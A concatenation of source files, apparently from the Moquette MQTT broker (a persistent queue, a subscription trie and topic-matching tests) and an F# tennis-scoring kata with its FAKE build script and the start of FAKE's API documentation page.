public void connectionLost(Throwable cause) {
m_connectionLost = true;
}
@Override
public void messageArrived(String topic, MqttMessage message) {
m_messages.offer(new ReceivedMessage(message, topic));
messageReceived = true;
}
/**
* Invoked when the message sent to a integration is ACKED (PUBACK or PUBCOMP by the integration)
*/
@Override
public void deliveryComplete(IMqttDeliveryToken token) {
// try {
// token.waitForCompletion(1_000);
// m_messages.offer(new ReceivedMessage(token.getMessage(), token.getTopics()[0]));
// } catch (MqttException e) {
// e.printStackTrace();
// }
}
}
<|start_filename|>broker/src/main/java/io/moquette/persistence/H2PersistentQueue.java<|end_filename|>
/*
* Copyright (c) 2012-2018 The original author or authors
* ------------------------------------------------------
* All rights reserved. This program and the accompanying materials
* are made available under the terms of the Eclipse Public License v1.0
* and Apache License v2.0 which accompanies this distribution.
*
* The Eclipse Public License is available at
* http://www.eclipse.org/legal/epl-v10.html
*
* The Apache License v2.0 is available at
* http://www.opensource.org/licenses/apache2.0.php
*
* You may elect to redistribute this code under either of these licenses.
*/
package io.moquette.persistence;
import io.moquette.broker.SessionRegistry;
import org.h2.mvstore.MVMap;
import org.h2.mvstore.MVStore;
import java.util.AbstractQueue;
import java.util.Iterator;
import java.util.concurrent.atomic.AtomicLong;
class H2PersistentQueue extends AbstractQueue<SessionRegistry.EnqueuedMessage> {
private final MVMap<Long, SessionRegistry.EnqueuedMessage> queueMap;
private final MVMap<String, Long> metadataMap;
private final AtomicLong head;
private final AtomicLong tail;
H2PersistentQueue(MVStore store, String queueName) {
if (queueName == null || queueName.isEmpty()) {
throw new IllegalArgumentException("queueName parameter can't be empty or null");
}
final MVMap.Builder<Long, SessionRegistry.EnqueuedMessage> messageTypeBuilder =
new MVMap.Builder<Long, SessionRegistry.EnqueuedMessage>()
.valueType(new EnqueuedMessageValueType());
this.queueMap = store.openMap("queue_" + queueName, messageTypeBuilder);
this.metadataMap = store.openMap("queue_" + queueName + "_meta");
//setup head index
long headIdx = 0L;
if (this.metadataMap.containsKey("head")) {
headIdx = this.metadataMap.get("head");
} else {
this.metadataMap.put("head", headIdx);
}
this.head = new AtomicLong(headIdx);
//setup tail index
long tailIdx = 0L;
if (this.metadataMap.containsKey("tail")) {
tailIdx = this.metadataMap.get("tail");
} else {
this.metadataMap.put("tail", tailIdx);
}
this.tail = new AtomicLong(tailIdx);
}
static void dropQueue(MVStore store, String queueName) {
store.removeMap(store.openMap("queue_" + queueName));
store.removeMap(store.openMap("queue_" + queueName + "_meta"));
}
@Override
public Iterator<SessionRegistry.EnqueuedMessage> iterator() {
return null;
}
@Override
public int size() {
return this.head.intValue() - this.tail.intValue();
}
@Override
public boolean offer(SessionRegistry.EnqueuedMessage t) {
if (t == null) {
throw new NullPointerException("Inserted element can't be null");
}
final long nextHead = head.getAndIncrement();
this.queueMap.put(nextHead, t);
this.metadataMap.put("head", nextHead + 1);
return true;
}
@Override
public SessionRegistry.EnqueuedMessage poll() {
if (head.equals(tail)) {
return null;
}
final long nextTail = tail.getAndIncrement();
final SessionRegistry.EnqueuedMessage tail = this.queueMap.get(nextTail);
queueMap.remove(nextTail);
this.metadataMap.put("tail", nextTail + 1);
return tail;
}
@Override
public SessionRegistry.EnqueuedMessage peek() {
if (head.equals(tail)) {
return null;
}
return this.queueMap.get(tail.get());
}
}
<|start_filename|>broker/src/main/java/io/moquette/broker/subscriptions/CTrie.java<|end_filename|>
package io.moquette.broker.subscriptions;
import java.util.Collections;
import java.util.HashSet;
import java.util.Optional;
import java.util.Set;
public class CTrie {
interface IVisitor<T> {
void visit(CNode node, int deep);
T getResult();
}
private static final Token ROOT = new Token("root");
private static final INode NO_PARENT = null;
private enum Action {
OK, REPEAT
}
INode root;
CTrie() {
final CNode mainNode = new CNode();
mainNode.setToken(ROOT);
this.root = new INode(mainNode);
}
Optional<CNode> lookup(Topic topic) {
INode inode = this.root;
Token token = topic.headToken();
while (!topic.isEmpty() && (inode.mainNode().anyChildrenMatch(token))) {
topic = topic.exceptHeadToken();
inode = inode.mainNode().childOf(token);
token = topic.headToken();
}
if (inode == null || !topic.isEmpty()) {
return Optional.empty();
}
return Optional.of(inode.mainNode());
}
enum NavigationAction {
MATCH, GODEEP, STOP
}
private NavigationAction evaluate(Topic topic, CNode cnode) {
if (Token.MULTI.equals(cnode.getToken())) {
return NavigationAction.MATCH;
}
if (topic.isEmpty()) {
return NavigationAction.STOP;
}
final Token token = topic.headToken();
if (!(Token.SINGLE.equals(cnode.getToken()) || cnode.getToken().equals(token) || ROOT.equals(cnode.getToken()))) {
return NavigationAction.STOP;
}
return NavigationAction.GODEEP;
}
public Set<Subscription> recursiveMatch(Topic topic) {
return recursiveMatch(topic, this.root);
}
private Set<Subscription> recursiveMatch(Topic topic, INode inode) {
CNode cnode = inode.mainNode();
if (cnode instanceof TNode) {
return Collections.emptySet();
}
NavigationAction action = evaluate(topic, cnode);
if (action == NavigationAction.MATCH) {
return cnode.subscriptions;
}
if (action == NavigationAction.STOP) {
return Collections.emptySet();
}
Topic remainingTopic = (ROOT.equals(cnode.getToken())) ? topic : topic.exceptHeadToken();
Set<Subscription> subscriptions = new HashSet<>();
if (remainingTopic.isEmpty()) {
subscriptions.addAll(cnode.subscriptions);
}
for (INode subInode : cnode.allChildren()) {
subscriptions.addAll(recursiveMatch(remainingTopic, subInode));
}
return subscriptions;
}
public void addToTree(Subscription newSubscription) {
Action res;
do {
res = insert(newSubscription.topicFilter, this.root, newSubscription);
} while (res == Action.REPEAT);
}
private Action insert(Topic topic, final INode inode, Subscription newSubscription) {
Token token = topic.headToken();
if (!topic.isEmpty() && inode.mainNode().anyChildrenMatch(token)) {
Topic remainingTopic = topic.exceptHeadToken();
INode nextInode = inode.mainNode().childOf(token);
return insert(remainingTopic, nextInode, newSubscription);
} else {
if (topic.isEmpty()) {
return insertSubscription(inode, newSubscription);
} else {
return createNodeAndInsertSubscription(topic, inode, newSubscription);
}
}
}
private Action insertSubscription(INode inode, Subscription newSubscription) {
CNode cnode = inode.mainNode();
CNode updatedCnode = cnode.copy().addSubscription(newSubscription);
if (inode.compareAndSet(cnode, updatedCnode)) {
return Action.OK;
} else {
return Action.REPEAT;
}
}
private Action createNodeAndInsertSubscription(Topic topic, INode inode, Subscription newSubscription) {
INode newInode = createPathRec(topic, newSubscription);
CNode cnode = inode.mainNode();
CNode updatedCnode = cnode.copy();
updatedCnode.add(newInode);
return inode.compareAndSet(cnode, updatedCnode) ? Action.OK : Action.REPEAT;
}
private INode createPathRec(Topic topic, Subscription newSubscription) {
Topic remainingTopic = topic.exceptHeadToken();
if (!remainingTopic.isEmpty()) {
INode inode = createPathRec(remainingTopic, newSubscription);
CNode cnode = new CNode();
cnode.setToken(topic.headToken());
cnode.add(inode);
return new INode(cnode);
} else {
return createLeafNodes(topic.headToken(), newSubscription);
}
}
private INode createLeafNodes(Token token, Subscription newSubscription) {
CNode newLeafCnode = new CNode();
newLeafCnode.setToken(token);
newLeafCnode.addSubscription(newSubscription);
return new INode(newLeafCnode);
}
public void removeFromTree(Topic topic, String clientID) {
Action res;
do {
res = remove(clientID, topic, this.root, NO_PARENT);
} while (res == Action.REPEAT);
}
private Action remove(String clientId, Topic topic, INode inode, INode iParent) {
Token token = topic.headToken();
if (!topic.isEmpty() && (inode.mainNode().anyChildrenMatch(token))) {
Topic remainingTopic = topic.exceptHeadToken();
INode nextInode = inode.mainNode().childOf(token);
return remove(clientId, remainingTopic, nextInode, inode);
} else {
final CNode cnode = inode.mainNode();
if (cnode instanceof TNode) {
// this inode is a tomb, has no clients and should be cleaned up
// Because we implemented cleanTomb below, this should be rare, but possible
// Consider calling cleanTomb here too
return Action.OK;
}
if (cnode.containsOnly(clientId) && topic.isEmpty() && cnode.allChildren().isEmpty()) {
// last client to leave this node, AND there are no downstream children, remove via TNode tomb
if (inode == this.root) {
return inode.compareAndSet(cnode, inode.mainNode().copy()) ? Action.OK : Action.REPEAT;
}
TNode tnode = new TNode();
return inode.compareAndSet(cnode, tnode) ? cleanTomb(inode, iParent) : Action.REPEAT;
} else if (cnode.contains(clientId) && topic.isEmpty()) {
CNode updatedCnode = cnode.copy();
updatedCnode.removeSubscriptionsFor(clientId);
return inode.compareAndSet(cnode, updatedCnode) ? Action.OK : Action.REPEAT;
} else {
//someone else already removed
return Action.OK;
}
}
}
/**
*
* Cleans Disposes of TNode in separate Atomic CAS operation per
* http://bravenewgeek.com/breaking-and-entering-lose-the-lock-while-embracing-concurrency/
*
* We roughly follow this theory above, but we allow CNode with no Subscriptions to linger (for now).
*
*
* @param inode inode that handle to the tomb node.
* @param iParent inode parent.
* @return REPEAT if the this methods wasn't successful or OK.
*/
private Action cleanTomb(INode inode, INode iParent) {
CNode updatedCnode = iParent.mainNode().copy();
updatedCnode.remove(inode);
return iParent.compareAndSet(iParent.mainNode(), updatedCnode) ? Action.OK : Action.REPEAT;
}
public int size() {
SubscriptionCounterVisitor visitor = new SubscriptionCounterVisitor();
dfsVisit(this.root, visitor, 0);
return visitor.getResult();
}
public String dumpTree() {
DumpTreeVisitor visitor = new DumpTreeVisitor();
dfsVisit(this.root, visitor, 0);
return visitor.getResult();
}
private void dfsVisit(INode node, IVisitor<?> visitor, int deep) {
if (node == null) {
return;
}
visitor.visit(node.mainNode(), deep);
++deep;
for (INode child : node.mainNode().allChildren()) {
dfsVisit(child, visitor, deep);
}
}
}
<|start_filename|>broker/src/main/java/io/moquette/broker/subscriptions/TNode.java<|end_filename|>
/*
* Copyright (c) 2012-2018 The original author or authors
* ------------------------------------------------------
* All rights reserved. This program and the accompanying materials
* are made available under the terms of the Eclipse Public License v1.0
* and Apache License v2.0 which accompanies this distribution.
*
* The Eclipse Public License is available at
* http://www.eclipse.org/legal/epl-v10.html
*
* The Apache License v2.0 is available at
* http://www.opensource.org/licenses/apache2.0.php
*
* You may elect to redistribute this code under either of these licenses.
*/
package io.moquette.broker.subscriptions;
class TNode extends CNode {
@Override
public Token getToken() {
throw new IllegalStateException("Can't be invoked on TNode");
}
@Override
public void setToken(Token token) {
throw new IllegalStateException("Can't be invoked on TNode");
}
@Override
INode childOf(Token token) {
throw new IllegalStateException("Can't be invoked on TNode");
}
@Override
CNode copy() {
throw new IllegalStateException("Can't be invoked on TNode");
}
@Override
public void add(INode newINode) {
throw new IllegalStateException("Can't be invoked on TNode");
}
@Override
CNode addSubscription(Subscription newSubscription) {
throw new IllegalStateException("Can't be invoked on TNode");
}
@Override
boolean containsOnly(String clientId) {
throw new IllegalStateException("Can't be invoked on TNode");
}
@Override
public boolean contains(String clientId) {
throw new IllegalStateException("Can't be invoked on TNode");
}
@Override
void removeSubscriptionsFor(String clientId) {
throw new IllegalStateException("Can't be invoked on TNode");
}
@Override
boolean anyChildrenMatch(Token token) {
return false;
}
}
<|start_filename|>broker/src/test/java/io/moquette/broker/subscriptions/CTrieSubscriptionDirectoryMatchingTest.java<|end_filename|>
/*
* Copyright (c) 2012-2018 The original author or authors
* ------------------------------------------------------
* All rights reserved. This program and the accompanying materials
* are made available under the terms of the Eclipse Public License v1.0
* and Apache License v2.0 which accompanies this distribution.
*
* The Eclipse Public License is available at
* http://www.eclipse.org/legal/epl-v10.html
*
* The Apache License v2.0 is available at
* http://www.opensource.org/licenses/apache2.0.php
*
* You may elect to redistribute this code under either of these licenses.
*/
package io.moquette.broker.subscriptions;
import io.moquette.broker.ISubscriptionsRepository;
import io.moquette.persistence.MemorySubscriptionsRepository;
import io.netty.handler.codec.mqtt.MqttQoS;
import org.junit.jupiter.api.BeforeEach;
import org.junit.jupiter.api.Test;
import java.util.Optional;
import java.util.Set;
import static io.moquette.broker.subscriptions.CTrieTest.clientSubOnTopic;
import static io.moquette.broker.subscriptions.Topic.asTopic;
import static org.assertj.core.api.Assertions.assertThat;
import static org.junit.jupiter.api.Assertions.assertEquals;
import static org.junit.jupiter.api.Assertions.assertTrue;
public class CTrieSubscriptionDirectoryMatchingTest {
private CTrieSubscriptionDirectory sut;
private ISubscriptionsRepository sessionsRepository;
@BeforeEach
public void setUp() {
sut = new CTrieSubscriptionDirectory();
this.sessionsRepository = new MemorySubscriptionsRepository();
sut.init(this.sessionsRepository);
}
@Test
public void testMatchSimple() {
Subscription slashSub = clientSubOnTopic("TempSensor1", "/");
sut.add(slashSub);
assertThat(sut.matchWithoutQosSharpening(asTopic("finance"))).isEmpty();
Subscription slashFinanceSub = clientSubOnTopic("TempSensor1", "/finance");
sut.add(slashFinanceSub);
assertThat(sut.matchWithoutQosSharpening(asTopic("finance"))).isEmpty();
assertThat(sut.matchWithoutQosSharpening(asTopic("/finance"))).contains(slashFinanceSub);
assertThat(sut.matchWithoutQosSharpening(asTopic("/"))).contains(slashSub);
}
@Test
public void testMatchSimpleMulti() {
Subscription anySub = clientSubOnTopic("TempSensor1", "#");
sut.add(anySub);
assertThat(sut.matchWithoutQosSharpening(asTopic("finance"))).contains(anySub);
Subscription financeAnySub = clientSubOnTopic("TempSensor1", "finance/#");
sut.add(financeAnySub);
assertThat(sut.matchWithoutQosSharpening(asTopic("finance"))).containsExactlyInAnyOrder(financeAnySub, anySub);
}
@Test
public void testMatchingDeepMulti_one_layer() {
Subscription anySub = clientSubOnTopic("AllSensor1", "#");
Subscription financeAnySub = clientSubOnTopic("FinanceSensor", "finance/#");
sut.add(anySub);
sut.add(financeAnySub);
// Verify
assertThat(sut.matchWithoutQosSharpening(asTopic("finance/stock")))
.containsExactlyInAnyOrder(financeAnySub, anySub);
assertThat(sut.matchWithoutQosSharpening(asTopic("finance/stock/ibm")))
.containsExactlyInAnyOrder(financeAnySub, anySub);
// System.out.println(sut.dumpTree());
}
@Test
public void testMatchingDeepMulti_two_layer() {
Subscription financeAnySub = clientSubOnTopic("FinanceSensor", "finance/stock/#");
sut.add(financeAnySub);
// Verify
assertThat(sut.matchWithoutQosSharpening(asTopic("finance/stock/ibm"))).containsExactly(financeAnySub);
}
@Test
public void testMatchSimpleSingle() {
Subscription anySub = clientSubOnTopic("AnySensor", "+");
sut.add(anySub);
assertThat(sut.matchWithoutQosSharpening(asTopic("finance"))).containsExactly(anySub);
Subscription financeOne = clientSubOnTopic("AnySensor", "finance/+");
sut.add(financeOne);
assertThat(sut.matchWithoutQosSharpening(asTopic("finance/stock"))).containsExactly(financeOne);
}
@Test
public void testMatchManySingle() {
Subscription manySub = clientSubOnTopic("AnySensor", "+/+");
sut.add(manySub);
// verify
assertThat(sut.matchWithoutQosSharpening(asTopic("/finance"))).contains(manySub);
}
@Test
public void testMatchSlashSingle() {
Subscription slashPlusSub = clientSubOnTopic("AnySensor", "/+");
sut.add(slashPlusSub);
Subscription anySub = clientSubOnTopic("AnySensor", "+");
sut.add(anySub);
// Verify
assertThat(sut.matchWithoutQosSharpening(asTopic("/finance"))).containsOnly(slashPlusSub);
assertThat(sut.matchWithoutQosSharpening(asTopic("/finance"))).doesNotContain(anySub);
}
@Test
public void testMatchManyDeepSingle() {
Subscription slashPlusSub = clientSubOnTopic("FinanceSensor1", "/finance/+/ibm");
sut.add(slashPlusSub);
Subscription slashPlusDeepSub = clientSubOnTopic("FinanceSensor2", "/+/stock/+");
sut.add(slashPlusDeepSub);
// Verify
assertThat(sut.matchWithoutQosSharpening(asTopic("/finance/stock/ibm")))
.containsExactlyInAnyOrder(slashPlusSub, slashPlusDeepSub);
}
@Test
public void testMatchSimpleMulti_allTheTree() {
Subscription sub = clientSubOnTopic("AnySensor1", "#");
sut.add(sub);
assertThat(sut.matchWithoutQosSharpening(asTopic("finance"))).isNotEmpty();
assertThat(sut.matchWithoutQosSharpening(asTopic("finance/ibm"))).isNotEmpty();
}
@Test
public void rogerLightTopicMatches() {
assertMatch("foo/bar", "foo/bar");
assertMatch("foo/bar", "foo/bar");
assertMatch("foo/+", "foo/bar");
assertMatch("foo/+/baz", "foo/bar/baz");
assertMatch("foo/+/#", "foo/bar/baz");
assertMatch("#", "foo/bar/baz");
assertNotMatch("foo/bar", "foo");
assertNotMatch("foo/+", "foo/bar/baz");
assertNotMatch("foo/+/baz", "foo/bar/bar");
assertNotMatch("foo/+/#", "fo2/bar/baz");
assertMatch("#", "/foo/bar");
assertMatch("/#", "/foo/bar");
assertNotMatch("/#", "foo/bar");
assertMatch("foo//bar", "foo//bar");
assertMatch("foo//+", "foo//bar");
assertMatch("foo/+/+/baz", "foo///baz");
assertMatch("foo/bar/+", "foo/bar/");
}
private void assertMatch(String s, String t) {
sut = new CTrieSubscriptionDirectory();
ISubscriptionsRepository sessionsRepository = new MemorySubscriptionsRepository();
sut.init(sessionsRepository);
Subscription sub = clientSubOnTopic("AnySensor1", s);
sut.add(sub);
assertThat(sut.matchWithoutQosSharpening(asTopic(t))).isNotEmpty();
}
private void assertNotMatch(String subscription, String topic) {
sut = new CTrieSubscriptionDirectory();
ISubscriptionsRepository sessionsRepository = new MemorySubscriptionsRepository();
sut.init(sessionsRepository);
Subscription sub = clientSubOnTopic("AnySensor1", subscription);
sut.add(sub);
assertThat(sut.matchWithoutQosSharpening(asTopic(topic))).isEmpty();
}
@Test
public void testOverlappingSubscriptions() {
Subscription genericSub = new Subscription("Sensor1", asTopic("a/+"), MqttQoS.AT_MOST_ONCE);
this.sessionsRepository.addNewSubscription(genericSub);
sut.add(genericSub);
Subscription specificSub = new Subscription("Sensor1", asTopic("a/b"), MqttQoS.AT_MOST_ONCE);
this.sessionsRepository.addNewSubscription(specificSub);
sut.add(specificSub);
//Exercise
final Set<Subscription> matchingForSpecific = sut.matchQosSharpening(asTopic("a/b"));
// Verify
assertThat(matchingForSpecific.size()).isEqualTo(1);
}
@Test
public void removeSubscription_withDifferentClients_subscribedSameTopic() {
Subscription slashSub = clientSubOnTopic("Sensor1", "/topic");
sut.add(slashSub);
Subscription slashSub2 = clientSubOnTopic("Sensor2", "/topic");
sut.add(slashSub2);
// Exercise
sut.removeSubscription(asTopic("/topic"), slashSub2.clientId);
// Verify
Subscription remainedSubscription = sut.matchWithoutQosSharpening(asTopic("/topic")).iterator().next();
assertThat(remainedSubscription.clientId).isEqualTo(slashSub.clientId);
assertEquals(slashSub.clientId, remainedSubscription.clientId);
}
@Test
public void removeSubscription_sameClients_subscribedSameTopic() {
Subscription slashSub = clientSubOnTopic("Sensor1", "/topic");
sut.add(slashSub);
// Exercise
sut.removeSubscription(asTopic("/topic"), slashSub.clientId);
// Verify
final Set<Subscription> matchingSubscriptions = sut.matchWithoutQosSharpening(asTopic("/topic"));
assertThat(matchingSubscriptions).isEmpty();
}
/*
* Test for Issue #49
*/
@Test
public void duplicatedSubscriptionsWithDifferentQos() {
Subscription client2Sub = new Subscription("client2", asTopic("client/test/b"), MqttQoS.AT_MOST_ONCE);
this.sut.add(client2Sub);
Subscription client1SubQoS0 = new Subscription("client1", asTopic("client/test/b"), MqttQoS.AT_MOST_ONCE);
this.sut.add(client1SubQoS0);
Subscription client1SubQoS2 = new Subscription("client1", asTopic("client/test/b"), MqttQoS.EXACTLY_ONCE);
this.sut.add(client1SubQoS2);
// Verify
Set<Subscription> subscriptions = this.sut.matchQosSharpening(asTopic("client/test/b"));
assertThat(subscriptions).contains(client1SubQoS2);
assertThat(subscriptions).contains(client2Sub);
final Optional<Subscription> matchingClient1Sub = subscriptions
.stream()
.filter(s -> s.equals(client1SubQoS0))
.findFirst();
assertTrue(matchingClient1Sub.isPresent());
Subscription client1Sub = matchingClient1Sub.get();
assertThat(client1SubQoS0.getRequestedQos()).isNotEqualTo(client1Sub.getRequestedQos());
// client1SubQoS2 should override client1SubQoS0
assertThat(client1Sub.getRequestedQos()).isEqualTo(client1SubQoS2.getRequestedQos());
}
}
| 10088/moquette |
<|start_filename|>KataTennis/Tennis.fs<|end_filename|>
module Ploeh.Katas.Tennis
type Player = PlayerOne | PlayerTwo
type Point = Love | Fifteen | Thirty
type PointsData = { PlayerOnePoint : Point; PlayerTwoPoint : Point }
type FortyData = { Player : Player; OtherPlayerPoint : Point }
type Score =
| Points of PointsData
| Forty of FortyData
| Deuce
| Advantage of Player
| Game of Player
let other = function PlayerOne -> PlayerTwo | PlayerTwo -> PlayerOne
let incrementPoint = function
| Love -> Some Fifteen
| Fifteen -> Some Thirty
| Thirty -> None
let pointTo player point current =
match player with
| PlayerOne -> { current with PlayerOnePoint = point }
| PlayerTwo -> { current with PlayerTwoPoint = point }
let pointFor player current =
match player with
| PlayerOne -> current.PlayerOnePoint
| PlayerTwo -> current.PlayerTwoPoint
// Transitions
let scoreWhenGame winner = Game winner
let scoreWhenAdvantage advantagedPlayer winner =
if advantagedPlayer = winner
then Game winner
else Deuce
let scoreWhenDeuce winner = Advantage winner
let scoreWhenForty current winner =
if current.Player = winner
then Game winner
else
match incrementPoint current.OtherPlayerPoint with
| Some p -> Forty { current with OtherPlayerPoint = p }
| None -> Deuce
let scoreWhenPoints current winner =
match pointFor winner current |> incrementPoint with
| Some np -> pointTo winner np current |> Points
| None -> Forty {
Player = winner
OtherPlayerPoint = pointFor (other winner) current }
// State machine
let score current winner =
match current with
| Points p -> scoreWhenPoints p winner
| Forty f -> scoreWhenForty f winner
| Deuce -> scoreWhenDeuce winner
| Advantage a -> scoreWhenAdvantage a winner
| Game g -> scoreWhenGame g
let newGame = Points { PlayerOnePoint = Love; PlayerTwoPoint = Love }
let scoreSeq wins = Seq.fold score newGame wins
// Formatting
let pointToString = function
| Love -> "love"
| Fifteen -> "15"
| Thirty -> "30"
let scoreToString playerOneName playerTwoName = function
| Points p ->
if p.PlayerOnePoint = p.PlayerTwoPoint
then p.PlayerOnePoint |> pointToString |> sprintf "%s-all"
else
sprintf
"%s-%s"
(pointToString p.PlayerOnePoint)
(pointToString p.PlayerTwoPoint)
| Forty f ->
let other = pointToString f.OtherPlayerPoint
if f.Player = PlayerOne
then sprintf "40-%s" other
else sprintf "%s-40" other
| Deuce -> "deuce"
| Advantage a ->
if a = PlayerOne
then sprintf "advantage %s" playerOneName
else sprintf "advantage %s" playerTwoName
| Game g ->
if g = PlayerOne
then sprintf "game %s" playerOneName
else sprintf "game %s" playerTwoName
<|start_filename|>KataTennis/Usage.fsx<|end_filename|>
#load "Tennis.fs"
open Ploeh.Katas.Tennis
let firstBall = score newGame PlayerTwo
let secondBall = score firstBall PlayerOne
let simpleGame =
scoreSeq [
PlayerTwo; PlayerTwo; PlayerOne; PlayerTwo; PlayerOne; PlayerOne;
PlayerTwo; PlayerTwo]
let displayGame = simpleGame |> scoreToString "<NAME>" "<NAME>"
<|start_filename|>Build.fsx<|end_filename|>
#r @"packages/FAKE.4.9.3/tools/FakeLib.dll"
open Fake
open Fake.Testing
Target "Clean" (fun _ ->
directExec (fun info ->
info.FileName <- "git"
info.Arguments <- "clean -xdf")
|> ignore)
Target "Build" (fun _ ->
!! "KataTennis.sln"
|> MSBuildDebug "" "Rebuild"
|> ignore)
Target "Test" (fun _ ->
!! "*/bin/Debug/*PropertyBased.dll"
|> xUnit2 id)
"Clean"
==> "Build"
==> "Test"
RunTargetOrDefault "Test"
<|start_filename|>packages/FAKE.4.9.3/docs/apidocs/index.html<|end_filename|>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Namespaces - FAKE - F# Make</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="">
<meta name="author" content="<NAME>, <NAME>, <NAME>">
<script src="https://code.jquery.com/jquery-1.8.0.js"></script>
<script src="https://code.jquery.com/ui/1.8.23/jquery-ui.js"></script>
<script src="https://netdna.bootstrapcdn.com/twitter-bootstrap/2.2.1/js/bootstrap.min.js"></script>
<script type="text/javascript" src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>
<link href="https://netdna.bootstrapcdn.com/twitter-bootstrap/2.2.1/css/bootstrap-combined.min.css" rel="stylesheet">
<link type="text/css" rel="stylesheet" href="http://fsharp.github.io/FAKE/content/style.css" />
<script type="text/javascript" src="http://fsharp.github.io/FAKE/content/tips.js"></script>
<!-- HTML5 shim, for IE6-8 support of HTML5 elements -->
<!--[if lt IE 9]>
<script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
</head>
<body>
<div class="container">
<div class="masthead">
<ul class="nav nav-pills pull-right">
<li><a href="http://fsharp.org">fsharp.org</a></li>
<li><a href="http://github.com/fsharp/fake">github page</a></li>
</ul>
<h3 class="muted"><a href="http://fsharp.github.io/FAKE/index.html">FAKE - F# Make</a></h3>
</div>
<hr />
<div class="row">
<div class="span9" id="main">
<h1>FAKE - F# Make</h1>
<h2>Fake Namespace</h2>
<div>
<table class="table table-bordered module-list">
<thead>
<tr><td>Module</td><td>Description</td></tr>
</thead>
<tbody>
<tr>
<td class="module-name">
<a href="fake-additionalsyntax.html">AdditionalSyntax</a>
</td>
<td class="xmldoc"><p>Provides functions and operators to deal with FAKE targets and target dependencies.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-androidpublisher.html">AndroidPublisher</a>
</td>
<td class="xmldoc"></td>
</tr>
<tr>
<td class="module-name">
<a href="fake-appveyor.html">AppVeyor</a>
</td>
<td class="xmldoc"><p>Contains code to configure FAKE for AppVeyor integration</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-archivehelper.html">ArchiveHelper</a>
</td>
<td class="xmldoc"><p>Provides utility tasks for storing and compressing files in archives.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-assemblyinfofile.html">AssemblyInfoFile</a>
</td>
<td class="xmldoc"><p>Contains tasks to generate AssemblyInfo files for C# and F#.
There is also a tutorial about the <a href="../assemblyinfo.html">AssemblyInfo tasks</a> available.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-assemblyinfohelper.html">AssemblyInfoHelper</a>
</td>
<td class="xmldoc"><p>Generates an AssemblyInfo file</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-azurehelper.html">AzureHelper</a>
</td>
<td class="xmldoc"><p>Contains tasks to control the local Azure Emulator</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-boot.html">Boot</a>
</td>
<td class="xmldoc"><p>Implements support for boostrapping FAKE scripts. A bootstrapping
<code>build.fsx</code> script executes twice (in two stages), allowing to
download dependencies with NuGet and do other preparatory work in
the first stage, and have these dependencies available in the
second stage.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-buildserverhelper.html">BuildServerHelper</a>
</td>
<td class="xmldoc"><p>Contains functions which allow build scripts to interact with a build server.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-cachehelper.html">CacheHelper</a>
</td>
<td class="xmldoc"><p>Contains functions which allows to deal with a cache.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-changewatcher.html">ChangeWatcher</a>
</td>
<td class="xmldoc"><p>This module contains helpers to react to file system events.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-configurationhelper.html">ConfigurationHelper</a>
</td>
<td class="xmldoc"><p>Contains functions which allow to read and write config files.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-cschelper.html">CscHelper</a>
</td>
<td class="xmldoc"><p>Contains tasks to compile C# source files with CSC.EXE (C# Compiler).</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-docuhelper.html">DocuHelper</a>
</td>
<td class="xmldoc"><p>Contains helper functions to run the XML documentation tool "docu".</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-dotcover.html">DotCover</a>
</td>
<td class="xmldoc"><p>Contains a task which can be used to run <a href="http://www.jetbrains.com/dotcover/">DotCover</a> on .NET assemblies.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-dynamicsnav.html">DynamicsNav</a>
</td>
<td class="xmldoc"><p>Contains helper function which allow to interact with Microsoft Dynamics NAV.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-dynamicsnavfile.html">DynamicsNavFile</a>
</td>
<td class="xmldoc"><p>Provides an abstraction over Dynamics NAV object files.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-environmenthelper.html">EnvironmentHelper</a>
</td>
<td class="xmldoc"><p>This module contains functions which allow to read and write environment variables and build parameters</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-fsihelper.html">FSIHelper</a>
</td>
<td class="xmldoc"><p>Contains helper functions which allow to interact with the F# Interactive.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-fsharpformatting.html">FSharpFormatting</a>
</td>
<td class="xmldoc"><p>Contains tasks which allow to run FSharp.Formatting for generating documentation.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-filehelper.html">FileHelper</a>
</td>
<td class="xmldoc"><p>Contains helper function which allow to deal with files and directories.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-filesystem.html">FileSystem</a>
</td>
<td class="xmldoc"><p>This module contains a file pattern globbing implementation.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-filesystemhelper.html">FileSystemHelper</a>
</td>
<td class="xmldoc"><p>Contains helpers which allow to interact with the file system.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-fileutils.html">FileUtils</a>
</td>
<td class="xmldoc"><p>Shell-like functions. Similar to <a href="http://www.ruby-doc.org/stdlib-2.0.0/libdoc/rake/rdoc/FileUtils.html">Ruby's FileUtils</a>.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-fixiehelper.html">FixieHelper</a>
</td>
<td class="xmldoc"><p>Contains tasks to run <a href="http://fixie.github.io/">Fixie</a> unit tests.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-fschelper.html">FscHelper</a>
</td>
<td class="xmldoc"><p>Contains tasks to compiles F# source file with the <a href="https://github.com/fsharp/FSharp.Compiler.Service">FSharp.Compiler.Service</a>.
